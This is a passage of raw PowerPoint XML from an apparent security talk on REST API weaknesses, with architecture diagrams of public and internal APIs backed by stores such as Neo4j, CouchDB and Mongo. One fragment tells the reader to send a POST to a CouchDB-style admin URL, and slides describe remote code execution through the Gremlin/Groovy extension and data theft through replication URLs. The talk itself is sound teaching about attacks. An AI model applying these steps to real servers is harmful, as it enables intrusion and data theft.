              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Change it to a POST to the following URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://svr.com:5984/admin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0154014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715962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Inbred Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228599" y="762000"/>
            <a:ext cx="4357141" cy="5943600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Externally exposed REST APIs typically use the same communication protocol (HTTP) and REST frameworks that are used in internal only REST APIs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Any vulnerabilities which are present in the public REST API can be used against the internal REST APIs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Flowchart: Terminator 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4331257" y="4002023"/>
            <a:ext cx="1600201" cy="301752"/>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SAP REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5282234" y="3809997"/>
            <a:ext cx="381000" cy="1"/>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6" name="Flowchart: Terminator 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5359958" y="3659124"/>
            <a:ext cx="914400" cy="301752"/>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SAP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Flowchart: Terminator 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4674158" y="5564123"/>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AS5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5282234" y="5714997"/>
            <a:ext cx="381000" cy="1"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Flowchart: Terminator 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5359958" y="5564124"/>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t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Flowchart: Terminator 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4312208" y="1849374"/>
            <a:ext cx="1638300" cy="301752"/>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Pub REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5282234" y="1447798"/>
            <a:ext cx="381000" cy="1"/>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12" name="Flowchart: Terminator 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5359958" y="12969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Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Can 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8021263" y="1981200"/>
            <a:ext cx="914400" cy="548640"/>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Mongo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Can 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8028482" y="2895600"/>
            <a:ext cx="914400" cy="548640"/>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Couch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Can 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8028482" y="1066800"/>
            <a:ext cx="914400" cy="548640"/>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Neo4j</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Can 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8021263" y="3870960"/>
            <a:ext cx="914400" cy="548640"/>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Cassan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Can 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8021263" y="4800600"/>
            <a:ext cx="914400" cy="548640"/>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HBase</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="1"/>
            <a:endCxn id="4" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131358" y="2819400"/>
            <a:ext cx="0" cy="53339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sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Can 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8028482" y="5775960"/>
            <a:ext cx="914400" cy="548640"/>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 19"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="2000250"/>
            <a:ext cx="789482"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21" name="Flowchart: Terminator 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6959969" y="1144713"/>
            <a:ext cx="762000" cy="453771"/>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REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Flowchart: Terminator 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6963627" y="2062773"/>
            <a:ext cx="754682" cy="453771"/>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REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Flowchart: Terminator 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6963627" y="2969856"/>
            <a:ext cx="754682" cy="453771"/>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REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Flowchart: Terminator 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6963627" y="3884256"/>
            <a:ext cx="754682" cy="453771"/>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REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Flowchart: Terminator 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6963627" y="4805973"/>
            <a:ext cx="754682" cy="453771"/>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REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Flowchart: Terminator 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6963627" y="5872773"/>
            <a:ext cx="754682" cy="453771"/>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REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Arrow Connector 26"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="2"/>
            <a:endCxn id="21" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5282234" y="1371599"/>
            <a:ext cx="1831850" cy="628651"/>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28" name="Straight Arrow Connector 27"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="2"/>
            <a:endCxn id="15" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7567855" y="1341120"/>
            <a:ext cx="460627" cy="3047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29" name="Straight Arrow Connector 28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="2"/>
            <a:endCxn id="22" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5282234" y="2000250"/>
            <a:ext cx="1831849" cy="28940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stCxn id="10" idx="2"/>
            <a:endCxn id="23" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5282234" y="2000250"/>
            <a:ext cx="1831849" cy="1196492"/>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31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="2"/>
            <a:endCxn id="24" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5282234" y="2000250"/>
            <a:ext cx="1831849" cy="2110892"/>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32" name="Straight Arrow Connector 31"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="2"/>
            <a:endCxn id="25" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5282234" y="2000250"/>
            <a:ext cx="1831849" cy="303260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33" name="Straight Arrow Connector 32"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="2"/>
            <a:endCxn id="26" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5282234" y="2000250"/>
            <a:ext cx="1831849" cy="409940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34" name="Straight Arrow Connector 33"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7571282" y="2255521"/>
            <a:ext cx="460627" cy="3047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35" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7571282" y="3200400"/>
            <a:ext cx="460627" cy="3047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36" name="Straight Arrow Connector 35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7567855" y="4160521"/>
            <a:ext cx="460627" cy="3047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37" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7571282" y="5074921"/>
            <a:ext cx="460627" cy="3047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38" name="Straight Arrow Connector 37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7567855" y="6096000"/>
            <a:ext cx="460627" cy="3047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452572302"/>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1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Extensions in REST frameworks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>enhance development of REST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>functionality </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>at the expense of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1447800"/>
            <a:ext cx="8686800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Turns remote code execution and data exfiltration from a security vulnerability into a feature.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In some cases it is subtle:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passing in partial script blocks used in evaluating the processing of nodes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passing in JavaScript functions which are used in map-reduce processes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In others it is more obvious:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passing in a complete Groovy script which is executed as a part of the request on the server.  Gremlin Plug-in for Neo4j.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passing in the source and target URLs for data replication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1906246731"/>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dirty="0" smtClean="0"/>
              <a:t>Rest Extensions Remote Code Execution(Demo)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1295400"/>
            <a:ext cx="8686800" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248124006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4038600" y="838200"/>
            <a:ext cx="4419600" cy="5486400"/>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 name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="838200"/>
            <a:ext cx="1447800" cy="5486400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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457200" y="122238"/>
            <a:ext cx="8229600" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application Architecture Background</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Block Arc 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2133600" y="2057401"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Cloud 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2301240"/>
            <a:ext cx="1447800" cy="426719"/>
          </a:xfrm>
          <a:prstGeom prst="clou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Internet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="2514599"/>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11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2362200" y="2514600"/>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14" name="Flowchart: Terminator 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2592324" y="2363726"/>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BH2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Block Arc 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3581400" y="2057402"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="2514600"/>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19" name="Straight Arrow Connector 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3810000" y="2514600"/>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20" name="Flowchart: Terminator 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4037076" y="23637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AS2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645152" y="2514599"/>
            <a:ext cx="381000" cy="1"/>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22" name="Flowchart: Terminator 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4722876" y="2363726"/>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SAP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Block Arc 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2133600" y="5257799"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Cloud 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="5501638"/>
            <a:ext cx="1447800" cy="426719"/>
          </a:xfrm>
          <a:prstGeom prst="clou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Internet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Straight Arrow Connector 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="5714997"/>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29" name="Straight Arrow Connector 28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2362200" y="5714997"/>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30" name="Flowchart: Terminator 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2592324" y="5564124"/>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BH5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Block Arc 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3581400" y="5257800"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Straight Arrow Connector 31"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="5714998"/>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33" name="Straight Arrow Connector 32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3810000" y="5714998"/>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34" name="Flowchart: Terminator 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4037076" y="5564123"/>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AS5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="35" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645152" y="5714997"/>
            <a:ext cx="381000" cy="1"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Flowchart: Terminator 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4722876" y="5564124"/>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t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Block Arc 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2136648" y="4191001"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Cloud 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="307848" y="4434840"/>
            <a:ext cx="1447800" cy="426719"/>
          </a:xfrm>
          <a:prstGeom prst="clou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Internet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Straight Arrow Connector 38"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1755648" y="4648199"/>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40" name="Straight Arrow Connector 39"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2365248" y="4648199"/>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41" name="Flowchart: Terminator 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2595372" y="4497326"/>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BH4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Block Arc 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3584448" y="4191002"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Straight Arrow Connector 42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3203448" y="4648200"/>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44" name="Straight Arrow Connector 43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3813048" y="4648200"/>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45" name="Flowchart: Terminator 44"/>
          <p:cNvSpPr/>
